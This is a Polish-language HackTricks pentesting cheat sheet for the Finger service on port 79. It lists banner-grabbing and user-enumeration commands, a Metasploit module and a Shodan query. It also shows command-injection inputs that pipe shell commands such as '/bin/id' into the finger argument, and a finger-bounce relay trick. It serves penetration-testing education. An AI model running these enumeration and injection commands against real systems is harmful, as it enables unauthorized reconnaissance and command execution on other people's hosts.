57 lines
1.8 KiB
Markdown

# 79 - Pentesting Finger
{{#include ../banners/hacktricks-training.md}}
## **Podstawowe informacje**
Program/usługa **Finger** jest wykorzystywana do uzyskiwania szczegółów o użytkownikach komputerów. Zazwyczaj dostarczane informacje obejmują **nazwę logowania użytkownika, pełne imię i nazwisko**, a w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe informacje mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas, kiedy użytkownik się zalogował, okres bezczynności (czas bezczynności), ostatni moment, w którym użytkownik przeczytał wiadomość e-mail, oraz zawartość plików planów i projektów użytkownika.
**Domyślny port:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Enumeracja**
### **Zbieranie banerów/Podstawowe połączenie**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Enumaracja użytkowników**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternatywnie możesz użyć **finger-user-enum** z [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), kilka przykładów:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap wykonuje skrypt przy użyciu domyślnych skryptów**
### Metasploit używa więcej sztuczek niż Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
- `port:79 USER`
## Wykonanie polecenia
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Finger Bounce
[Użyj systemu jako przekaźnika finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{{#include ../banners/hacktricks-training.md}}